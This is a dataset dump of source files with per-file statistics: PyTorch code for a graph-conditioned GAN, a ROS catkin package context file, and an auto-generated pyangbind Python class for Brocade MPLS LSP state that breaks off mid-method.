self.tanh = Tanh()
def forward(self, z, t, edges):
z = z.view(-1, 128)#
t = t.view(-1, 10) #
x = cat([z, t], 1)
x = self.linear_reshape_1(x)
x = x.view(-1, 16, 8, 8)
x = self.conv_mpn_1(x, edges).view(-1, *x.shape[1:])
x = self.upsample_1(x)
x = self.leaky_relu(x)
x = self.conv_mpn_2(x, edges).view(-1, *x.shape[1:])
x = self.upsample_2(x)
x = self.leaky_relu(x)
x = self.conv_1(x.view(-1, x.shape[1], *x.shape[2:]))
x = self.leaky_relu(x)
x = self.conv_2(x)
x = self.leaky_relu(x)
x = self.conv_3(x)
x = self.tanh(x)
x = x.view(-1, *x.shape[2:])
return x
class Discriminator(Module):
def __init__(self):
super().__init__()
self.linear_reshape_1 = Linear(10, 8192)
self.leaky_relu = LeakyReLU(0.1)
self.conv_1 = Conv2d(9, 16, 3, 1, 1, bias=True)
self.conv_2 = Conv2d(16, 16, 3, 1, 1)
self.conv_3 = Conv2d(16, 16, 3, 1, 1)
self.conv_mpn_1 = ConvMPN()
self.downsample_1 = Conv2d(16, 16, 3, 2, 1)
self.conv_mpn_2 = ConvMPN()
self.downsample_2 = Conv2d(16, 16, 3, 2, 1)
self.dec_conv_1 = Conv2d(16, 256, 3, 2, 1)
self.dec_conv_2 = Conv2d(256, 128, 3, 2, 1)
self.dec_conv_3 = Conv2d(128, 128, 3, 2, 1)
self.pool_reshape_linear = Linear(128, 1)
def add_pool(self, x, nd_to_sample):
dtype, device = x.dtype, x.device
batch_size = torch.max(nd_to_sample) + 1
pooled_x = torch.zeros(batch_size, x.shape[-1], device=device).float()
pool_to = nd_to_sample.view(-1, 1).expand_as(x).to(device)
pooled_x = pooled_x.scatter_add(0, pool_to, x)
return pooled_x
def forward(self, x, t, edges, nd_to_sample):
x = x.view(-1, 1, 32, 32)
t = self.linear_reshape_1(t)
t = t.view(-1, 8, 32, 32)
x = cat([x, t], 1)
x = self.conv_1(x)
x = self.leaky_relu(x)
x = self.conv_2(x)
x = self.leaky_relu(x)
x = self.conv_3(x)
x = self.leaky_relu(x)
x = self.conv_mpn_1(x, edges)
x = self.downsample_1(x)
x = self.leaky_relu(x)
x = self.conv_mpn_2(x, edges)
x = self.downsample_2(x)
x = self.leaky_relu(x)
x = self.dec_conv_1(x)
x = self.leaky_relu(x)
x = self.dec_conv_2(x)
x = self.leaky_relu(x)
x = self.dec_conv_3(x)
x = self.leaky_relu(x)
x = x.view(-1, x.shape[1])
x = self.add_pool(x, nd_to_sample)
x = self.pool_reshape_linear(x)
return x
| 36.35461 | 110 | 0.584666 | import torch
from torch import cat
from torch.nn import Conv2d
from torch.nn import Linear
from torch.nn import Module
from torch.nn import ConvTranspose2d
from torch.nn import LeakyReLU
from torch.nn import Tanh
from torch.nn import MaxPool2d
from torch import zeros_like
class ConvMPN(Module):
def __init__(self):
super().__init__()
self.conv1 = Conv2d(in_channels=3*16, out_channels=2*16, kernel_size=(3, 3), stride=(1, 1), padding=1)
self.conv2 = Conv2d(in_channels=2*16, out_channels=2*16, kernel_size=(3, 3), stride=(1, 1), padding=1)
self.conv3 = Conv2d(in_channels=2*16, out_channels=16, kernel_size=(3, 3), stride=(1, 1), padding=1)
self.leaky_relu = LeakyReLU(0.1)
def get_nodes(self, feature_vectors, edges, include_neighbours=True):
device = feature_vectors.device
nodes = zeros_like(feature_vectors, device=device)
if include_neighbours:
index = torch.where(edges[:, 1] > 0)
else:
index = torch.where(edges[:, 1] < 0)
src = torch.cat([edges[index[0], 0], edges[index[0], 2]]).long()
dst = torch.cat([edges[index[0], 2], edges[index[0], 0]]).long()
src = feature_vectors[src.contiguous()]
dst = dst.view(-1, 1, 1, 1).expand_as(src).to(device)
return nodes.scatter_add(0, dst, src)
def cat_nodes(self, feature_vectors, edges):
neighbouring_nodes = self.get_nodes(feature_vectors, edges, include_neighbours=True, )
non_neighbouring_nodes = self.get_nodes(feature_vectors, edges, include_neighbours=False)
encoding = torch.cat([feature_vectors, neighbouring_nodes, non_neighbouring_nodes], 1)
return encoding
def forward(self, x, edges):
x = self.cat_nodes(x, edges)
x = self.conv1(x)
x = self.leaky_relu(x)
x = self.conv2(x)
x = self.leaky_relu(x)
x = self.conv3(x)
x = self.leaky_relu(x)
return x
class Generator(Module):
def __init__(self):
super().__init__()
self.linear_reshape_1 = Linear(138, 1024)
self.conv_mpn_1 = ConvMPN()
self.upsample_1 = ConvTranspose2d(16, 16, 4, 2, 1)
self.conv_mpn_2 = ConvMPN()
self.upsample_2 = ConvTranspose2d(16, 16, 4, 2, 1)
self.conv_1 = Conv2d(16, 256, 3, 1, 1)
self.leaky_relu = LeakyReLU(0.1)
self.conv_2 = Conv2d(256, 128, 3, 1, 1)
self.conv_3 = Conv2d(128, 1, 3, 1, 1)
self.tanh = Tanh()
def forward(self, z, t, edges):
z = z.view(-1, 128)
t = t.view(-1, 10)
x = cat([z, t], 1)
x = self.linear_reshape_1(x)
x = x.view(-1, 16, 8, 8)
x = self.conv_mpn_1(x, edges).view(-1, *x.shape[1:])
x = self.upsample_1(x)
x = self.leaky_relu(x)
x = self.conv_mpn_2(x, edges).view(-1, *x.shape[1:])
x = self.upsample_2(x)
x = self.leaky_relu(x)
x = self.conv_1(x.view(-1, x.shape[1], *x.shape[2:]))
x = self.leaky_relu(x)
x = self.conv_2(x)
x = self.leaky_relu(x)
x = self.conv_3(x)
x = self.tanh(x)
x = x.view(-1, *x.shape[2:])
return x
class Discriminator(Module):
def __init__(self):
super().__init__()
self.linear_reshape_1 = Linear(10, 8192)
self.leaky_relu = LeakyReLU(0.1)
self.conv_1 = Conv2d(9, 16, 3, 1, 1, bias=True)
self.conv_2 = Conv2d(16, 16, 3, 1, 1)
self.conv_3 = Conv2d(16, 16, 3, 1, 1)
self.conv_mpn_1 = ConvMPN()
self.downsample_1 = Conv2d(16, 16, 3, 2, 1)
self.conv_mpn_2 = ConvMPN()
self.downsample_2 = Conv2d(16, 16, 3, 2, 1)
self.dec_conv_1 = Conv2d(16, 256, 3, 2, 1)
self.dec_conv_2 = Conv2d(256, 128, 3, 2, 1)
self.dec_conv_3 = Conv2d(128, 128, 3, 2, 1)
self.pool_reshape_linear = Linear(128, 1)
def add_pool(self, x, nd_to_sample):
dtype, device = x.dtype, x.device
batch_size = torch.max(nd_to_sample) + 1
pooled_x = torch.zeros(batch_size, x.shape[-1], device=device).float()
pool_to = nd_to_sample.view(-1, 1).expand_as(x).to(device)
pooled_x = pooled_x.scatter_add(0, pool_to, x)
return pooled_x
def forward(self, x, t, edges, nd_to_sample):
x = x.view(-1, 1, 32, 32)
t = self.linear_reshape_1(t)
t = t.view(-1, 8, 32, 32)
x = cat([x, t], 1)
x = self.conv_1(x)
x = self.leaky_relu(x)
x = self.conv_2(x)
x = self.leaky_relu(x)
x = self.conv_3(x)
x = self.leaky_relu(x)
x = self.conv_mpn_1(x, edges)
x = self.downsample_1(x)
x = self.leaky_relu(x)
x = self.conv_mpn_2(x, edges)
x = self.downsample_2(x)
x = self.leaky_relu(x)
x = self.dec_conv_1(x)
x = self.leaky_relu(x)
x = self.dec_conv_2(x)
x = self.leaky_relu(x)
x = self.dec_conv_3(x)
x = self.leaky_relu(x)
x = x.view(-1, x.shape[1])
x = self.add_pool(x, nd_to_sample)
x = self.pool_reshape_linear(x)
return x
| true | true |
f72ef61fc1dcc54611562b5350866141b7262a8c | 507 | py | Python | build/summit_xl_common/summit_xl_localization/catkin_generated/pkg.develspace.context.pc.py | Jam-cpu/Masters-Project---Final | 0b266b1f117a579b96507249f0a128d0e3cc082a | [
"BSD-3-Clause-Clear"
] | null | null | null | build/summit_xl_common/summit_xl_localization/catkin_generated/pkg.develspace.context.pc.py | Jam-cpu/Masters-Project---Final | 0b266b1f117a579b96507249f0a128d0e3cc082a | [
"BSD-3-Clause-Clear"
] | null | null | null | build/summit_xl_common/summit_xl_localization/catkin_generated/pkg.develspace.context.pc.py | Jam-cpu/Masters-Project---Final | 0b266b1f117a579b96507249f0a128d0e3cc082a | [
"BSD-3-Clause-Clear"
] | null | null | null | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "robot_localization;roscpp;tf;tf2;tf2_ros;message_filters;std_msgs;std_srvs;geometry_msgs;nav_msgs;sensor_msgs;robotnik_msgs;mavros_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "summit_xl_localization"
PROJECT_SPACE_DIR = "/workspace/devel"
PROJECT_VERSION = "1.1.3"
| 56.333333 | 180 | 0.763314 |
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "robot_localization;roscpp;tf;tf2;tf2_ros;message_filters;std_msgs;std_srvs;geometry_msgs;nav_msgs;sensor_msgs;robotnik_msgs;mavros_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "summit_xl_localization"
PROJECT_SPACE_DIR = "/workspace/devel"
PROJECT_VERSION = "1.1.3"
| true | true |
f72ef6e9a81af96f8effa83530a460f9a5ebed9d | 38,041 | py | Python | pybind/slxos/v16r_1_00b/mpls_state/lsp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/lsp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/lsp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import basic
import forwarding
import frr
import backup
import instances
import secondary_path
class lsp(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls-operational - based on the path /mpls-state/lsp. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: MPLS LSP operational information
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp_name','__lsp_type','__bypass_lsp_type','__interface','__history','__basic','__forwarding','__frr','__backup','__instances','__secondary_path',)
_yang_name = 'lsp'
_rest_name = 'lsp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__instances = YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__bypass_lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
self.__frr = YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__basic = YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__interface = YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__forwarding = YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__backup = YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__secondary_path = YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__history = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'lsp']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'lsp']
def _get_lsp_name(self):
"""
Getter method for lsp_name, mapped from YANG variable /mpls_state/lsp/lsp_name (string)
YANG Description: LSP Name
"""
return self.__lsp_name
def _set_lsp_name(self, v, load=False):
"""
Setter method for lsp_name, mapped from YANG variable /mpls_state/lsp/lsp_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_name() directly.
YANG Description: LSP Name
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name(self):
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_lsp_type(self):
"""
Getter method for lsp_type, mapped from YANG variable /mpls_state/lsp/lsp_type (lsp-type)
YANG Description: LSP Type
"""
return self.__lsp_type
def _set_lsp_type(self, v, load=False):
"""
Setter method for lsp_type, mapped from YANG variable /mpls_state/lsp/lsp_type (lsp-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_type() directly.
YANG Description: LSP Type
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_type must be of a type compatible with lsp-type""",
'defined-type': "brocade-mpls-operational:lsp-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)""",
})
self.__lsp_type = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_type(self):
self.__lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
def _get_bypass_lsp_type(self):
"""
Getter method for bypass_lsp_type, mapped from YANG variable /mpls_state/lsp/bypass_lsp_type (bypass-lsp-type)
YANG Description: Bypass LSP Type
"""
return self.__bypass_lsp_type
def _set_bypass_lsp_type(self, v, load=False):
"""
Setter method for bypass_lsp_type, mapped from YANG variable /mpls_state/lsp/bypass_lsp_type (bypass-lsp-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_type() directly.
YANG Description: Bypass LSP Type
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_type must be of a type compatible with bypass-lsp-type""",
'defined-type': "brocade-mpls-operational:bypass-lsp-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)""",
})
self.__bypass_lsp_type = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_type(self):
self.__bypass_lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
def _get_interface(self):
"""
Getter method for interface, mapped from YANG variable /mpls_state/lsp/interface (string)
YANG Description: Bypass LSP interface
"""
return self.__interface
def _set_interface(self, v, load=False):
"""
Setter method for interface, mapped from YANG variable /mpls_state/lsp/interface (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface() directly.
YANG Description: Bypass LSP interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__interface = t
if hasattr(self, '_set'):
self._set()
def _unset_interface(self):
self.__interface = YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_history(self):
"""
Getter method for history, mapped from YANG variable /mpls_state/lsp/history (string)
YANG Description: MPLS LSP history Information
"""
return self.__history
def _set_history(self, v, load=False):
"""
Setter method for history, mapped from YANG variable /mpls_state/lsp/history (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_history is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_history() directly.
YANG Description: MPLS LSP history Information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """history must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__history = t
if hasattr(self, '_set'):
self._set()
def _unset_history(self):
self.__history = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_basic(self):
"""
Getter method for basic, mapped from YANG variable /mpls_state/lsp/basic (container)
YANG Description: MPLS basic LSP operational information
"""
return self.__basic
def _set_basic(self, v, load=False):
"""
Setter method for basic, mapped from YANG variable /mpls_state/lsp/basic (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_basic is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_basic() directly.
YANG Description: MPLS basic LSP operational information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """basic must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__basic = t
if hasattr(self, '_set'):
self._set()
def _unset_basic(self):
self.__basic = YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_forwarding(self):
"""
Getter method for forwarding, mapped from YANG variable /mpls_state/lsp/forwarding (container)
YANG Description: MPLS LSP forwarding information
"""
return self.__forwarding
def _set_forwarding(self, v, load=False):
"""
Setter method for forwarding, mapped from YANG variable /mpls_state/lsp/forwarding (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_forwarding is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_forwarding() directly.
YANG Description: MPLS LSP forwarding information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """forwarding must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__forwarding = t
if hasattr(self, '_set'):
self._set()
def _unset_forwarding(self):
